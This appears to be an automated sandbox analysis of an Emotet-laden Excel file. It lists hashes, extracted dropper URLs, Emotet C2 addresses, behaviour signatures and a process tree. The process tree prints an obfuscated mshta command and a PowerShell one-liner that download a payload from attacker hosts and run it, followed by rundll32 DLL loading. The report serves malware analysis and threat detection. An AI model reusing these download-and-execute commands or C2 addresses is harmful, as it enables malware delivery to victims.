Analysis

  • max time kernel
    147s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-en-20220112
  • submitted
    21-01-2022 09:40

General

  • Target

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls

  • Size

    71KB

  • MD5

    21fc12ef8a4a4ba5b38a303fa7e70c08

  • SHA1

    5700a2231371b289eae19ce62e1a73457ee582c4

  • SHA256

    6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5

  • SHA512

    8200f14c0a8023bb74b39796f7859258ef67a21a5f81704f82315695409795fe724ac8ca81513a95d50d169c824532e43865846ce42b0e541366309ace849654

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

http://0xb907d607/fer/fe2.html

Extracted

Language
ps1
Deobfuscated
URLs
ps1.dropper

http://185.7.214.7/fer/fe2.png

Extracted

Family

emotet

Botnet

Epoch4

C2

131.100.24.231:80

209.59.138.75:7080

103.8.26.103:8080

51.38.71.0:443

212.237.17.99:8080

79.172.212.216:8080

207.38.84.195:8080

104.168.155.129:8080

178.79.147.66:8080

46.55.222.11:443

103.8.26.102:8080

192.254.71.210:443

45.176.232.124:443

203.114.109.124:443

51.68.175.8:8080

58.227.42.236:80

45.142.114.231:8080

217.182.143.207:443

178.63.25.185:443

45.118.115.99:8080

eck1.plain
ecs1.plain

Signatures

  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of NtCreateProcessExOtherParentProcess 1 IoCs
  • Blocklisted process makes network request 5 IoCs
  • Downloads MZ/PE file
  • Sets service image path in registry 2 TTPs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 4 IoCs
  • Drops file in System32 directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 1 IoCs
  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 5 IoCs
  • Modifies data under HKEY_USERS 41 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 22 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\6407591df6ce61f946e24715faa6fba1b1f3221e2baf22f6c4f5a64f1ea98eb5.xls"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1972
    • C:\Windows\SYSTEM32\cmd.exe
      cmd /c m^sh^t^a h^tt^p^:/^/0xb907d607/fer/fe2.html
      2⤵
      • Process spawned unexpected child process
      • Suspicious use of WriteProcessMemory
      PID:2960
      • C:\Windows\system32\mshta.exe
        mshta http://0xb907d607/fer/fe2.html
        3⤵
        • Blocklisted process makes network request
        • Checks computer location settings
        • Suspicious use of WriteProcessMemory
        PID:2880
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit $c1='({GOOGLE}{GOOGLE}Ne{GOOGLE}{GOOGLE}w{GOOGLE}-Obj{GOOGLE}ec{GOOGLE}{GOOGLE}t N{GOOGLE}{GOOGLE}et{GOOGLE}.W{GOOGLE}{GOOGLE}e'.replace('{GOOGLE}', ''); $c4='bC{GOOGLE}li{GOOGLE}{GOOGLE}en{GOOGLE}{GOOGLE}t).D{GOOGLE}{GOOGLE}ow{GOOGLE}{GOOGLE}nl{GOOGLE}{GOOGLE}{GOOGLE}o'.replace('{GOOGLE}', ''); $c3='ad{GOOGLE}{GOOGLE}St{GOOGLE}rin{GOOGLE}{GOOGLE}g{GOOGLE}(''ht{GOOGLE}tp{GOOGLE}://185.7.214.7/fer/fe2.png'')'.replace('{GOOGLE}', '');$JI=($c1,$c4,$c3 -Join '');I`E`X $JI|I`E`X
          4⤵
          • Blocklisted process makes network request
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3688
          • C:\Windows\system32\cmd.exe
            "C:\Windows\system32\cmd.exe" /c C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
            5⤵
            • Suspicious use of WriteProcessMemory
            PID:1608
            • C:\Windows\SysWow64\rundll32.exe
              C:\Windows\SysWow64\rundll32.exe C:\Users\Public\Documents\ssd.dll,AnyString
              6⤵
              • Loads dropped DLL
              • Suspicious use of WriteProcessMemory
              PID:1140
              • C:\Windows\SysWOW64\rundll32.exe
                C:\Windows\SysWOW64\rundll32.exe "C:\Users\Public\Documents\ssd.dll",DllRegisterServer
                7⤵
                • Loads dropped DLL
                • Drops file in System32 directory
                • Suspicious use of WriteProcessMemory
                PID:1748
                • C:\Windows\SysWOW64\rundll32.exe
                  C:\Windows\SysWOW64\rundll32.exe "C:\Windows\SysWOW64\Jdowqhbcwm\ftntgvvm.bfq",PkZBNRMRRWiXuR
                  8⤵
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:2184
                  • C:\Windows\SysWOW64\rundll32.exe
                    C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\Jdowqhbcwm\ftntgvvm.bfq",DllRegisterServer
                    9⤵
                    • Blocklisted process makes network request
                    • Loads dropped DLL
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4040
        • C:\Windows\system32\WerFault.exe
          C:\Windows\system32\WerFault.exe -u -p 2880 -s 1720
          4⤵
          • Program crash
          • Checks processor information in registry
          • Enumerates system info in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:2944
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p
    1⤵
      PID:928
    • C:\Windows\System32\WaaSMedicAgent.exe
      C:\Windows\System32\WaaSMedicAgent.exe 276553179ffdd4f5c29c3d44fc6bfc6a C25sboTFCk+5gsrP8JQ7OQ.0.1.0.0.0
      1⤵
      • Modifies data under HKEY_USERS
      PID:3764
    • C:\Windows\system32\WerFault.exe
      C:\Windows\system32\WerFault.exe -pss -s 364 -p 2880 -ip 2880
      1⤵
      • Suspicious use of NtCreateProcessExOtherParentProcess
      • Suspicious use of WriteProcessMemory
      PID:1996

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Persistence

    Registry Run Keys / Startup Folder

    1
    T1060

    Defense Evasion

    Modify Registry

    1
    T1112

    Discovery

    Query Registry

    3
    T1012

    System Information Discovery

    4
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Public\Documents\ssd.dll
      MD5

      21b53d3a04fc0f497bf1e60164d2e6e4

      SHA1

      68f9ac8ed0269b0ae9af50d97ce59421843e69ea

      SHA256

      5821f37f403fbc207315f5a2a8b5492a2abc556747d984ebfd9e21fa6270edaa

      SHA512

      344d745a91820d0677d71f70e8f552bd7f879026acb675d01217915e0dff845ad4ed6216a5a2dc1dce29e1bfc9e14f46d0d2a02c4617003b84e74ebfc581148b

    • C:\Users\Public\Documents\ssd.dll
      MD5

      21b53d3a04fc0f497bf1e60164d2e6e4

      SHA1

      68f9ac8ed0269b0ae9af50d97ce59421843e69ea

      SHA256

      5821f37f403fbc207315f5a2a8b5492a2abc556747d984ebfd9e21fa6270edaa

      SHA512

      344d745a91820d0677d71f70e8f552bd7f879026acb675d01217915e0dff845ad4ed6216a5a2dc1dce29e1bfc9e14f46d0d2a02c4617003b84e74ebfc581148b

    • C:\Users\Public\Documents\ssd.dll
      MD5

      21b53d3a04fc0f497bf1e60164d2e6e4

      SHA1

      68f9ac8ed0269b0ae9af50d97ce59421843e69ea

      SHA256

      5821f37f403fbc207315f5a2a8b5492a2abc556747d984ebfd9e21fa6270edaa

      SHA512

      344d745a91820d0677d71f70e8f552bd7f879026acb675d01217915e0dff845ad4ed6216a5a2dc1dce29e1bfc9e14f46d0d2a02c4617003b84e74ebfc581148b

    • C:\Windows\SysWOW64\Jdowqhbcwm\ftntgvvm.bfq
      MD5

      21b53d3a04fc0f497bf1e60164d2e6e4

      SHA1

      68f9ac8ed0269b0ae9af50d97ce59421843e69ea

      SHA256

      5821f37f403fbc207315f5a2a8b5492a2abc556747d984ebfd9e21fa6270edaa

      SHA512

      344d745a91820d0677d71f70e8f552bd7f879026acb675d01217915e0dff845ad4ed6216a5a2dc1dce29e1bfc9e14f46d0d2a02c4617003b84e74ebfc581148b

    • C:\Windows\SysWOW64\Jdowqhbcwm\ftntgvvm.bfq
      MD5

      21b53d3a04fc0f497bf1e60164d2e6e4

      SHA1

      68f9ac8ed0269b0ae9af50d97ce59421843e69ea

      SHA256

      5821f37f403fbc207315f5a2a8b5492a2abc556747d984ebfd9e21fa6270edaa

      SHA512

      344d745a91820d0677d71f70e8f552bd7f879026acb675d01217915e0dff845ad4ed6216a5a2dc1dce29e1bfc9e14f46d0d2a02c4617003b84e74ebfc581148b

    • memory/1140-189-0x0000000004761000-0x0000000004783000-memory.dmp
      Filesize

      136KB

    • memory/1748-201-0x0000000004F30000-0x0000000004F56000-memory.dmp
      Filesize

      152KB

    • memory/1748-199-0x0000000004ED0000-0x0000000004EF6000-memory.dmp
      Filesize

      152KB

    • memory/1748-197-0x0000000004D40000-0x0000000004D66000-memory.dmp
      Filesize

      152KB

    • memory/1748-195-0x0000000004C60000-0x0000000004C86000-memory.dmp
      Filesize

      152KB

    • memory/1748-207-0x00000000051B0000-0x00000000051D6000-memory.dmp
      Filesize

      152KB

    • memory/1972-137-0x00007FFC69D90000-0x00007FFC69DA0000-memory.dmp
      Filesize

      64KB

    • memory/1972-247-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-248-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-130-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-249-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-250-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-138-0x00007FFC69D90000-0x00007FFC69DA0000-memory.dmp
      Filesize

      64KB

    • memory/1972-134-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-133-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-132-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/1972-131-0x00007FFC6C090000-0x00007FFC6C0A0000-memory.dmp
      Filesize

      64KB

    • memory/2184-204-0x0000000000CC0000-0x0000000000CE6000-memory.dmp
      Filesize

      152KB

    • memory/3688-172-0x0000022595B70000-0x0000022595BE7000-memory.dmp
      Filesize

      476KB

    • memory/3688-174-0x00000225AFE90000-0x00000225AFED4000-memory.dmp
      Filesize

      272KB

    • memory/3688-168-0x0000022597960000-0x0000022597982000-memory.dmp
      Filesize

      136KB

    • memory/3688-171-0x0000022595B70000-0x0000022595BE7000-memory.dmp
      Filesize

      476KB

    • memory/3688-192-0x00000225AFF60000-0x00000225AFFD6000-memory.dmp
      Filesize

      472KB

    • memory/3688-173-0x0000022595B70000-0x0000022595BE7000-memory.dmp
      Filesize

      476KB

    • memory/4040-215-0x00000000056B0000-0x00000000056D6000-memory.dmp
      Filesize

      152KB

    • memory/4040-221-0x00000000059C0000-0x00000000059E6000-memory.dmp
      Filesize

      152KB

    • memory/4040-223-0x0000000005AA0000-0x0000000005AC6000-memory.dmp
      Filesize

      152KB

    • memory/4040-225-0x0000000005C90000-0x0000000005CB6000-memory.dmp
      Filesize

      152KB

    • memory/4040-219-0x0000000005890000-0x00000000058B6000-memory.dmp
      Filesize

      152KB

    • memory/4040-217-0x0000000005790000-0x00000000057B6000-memory.dmp
      Filesize

      152KB

    • memory/4040-213-0x0000000005650000-0x0000000005676000-memory.dmp
      Filesize

      152KB

    • memory/4040-211-0x0000000005450000-0x0000000005476000-memory.dmp
      Filesize

      152KB